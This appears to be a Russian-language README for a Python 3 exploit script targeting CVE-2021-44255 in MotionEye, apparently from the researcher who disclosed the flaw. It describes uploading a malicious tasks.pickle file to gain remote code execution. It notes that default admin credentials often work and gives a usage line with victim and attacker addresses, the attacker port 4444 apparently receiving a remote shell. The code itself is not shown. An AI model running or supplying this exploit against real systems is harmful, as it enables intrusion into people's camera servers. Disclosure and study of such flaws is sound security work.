
Скрипт на Python 3, который загружает файл tasks.pickle, позволяющий выполнять RCE в MotionEye. CVE-2021-44255
Скрипт на Python 3, который загружает файл tasks.pickle, позволяющий выполнить RCE в MotionEye. Вам нужны учетные данные администратора, так что это не должно быть большой проблемой. К сожалению, MotionEye/MotionEyeOS часто можно найти работающим с учетными данными по умолчанию.
Пример:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
Где victim и attacker указываются в формате ip:port, если только порт не равен 80. В этом случае порт можно не указывать. По умолчанию используется имя пользователя admin с пустым паролем. Также есть параметры командной строки для других имен пользователей/паролей. Пожалуйста, смотрите код для получения дополнительной информации.
CVE-2021-44255
Смотрите https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye для получения информации об этой и других проблемах.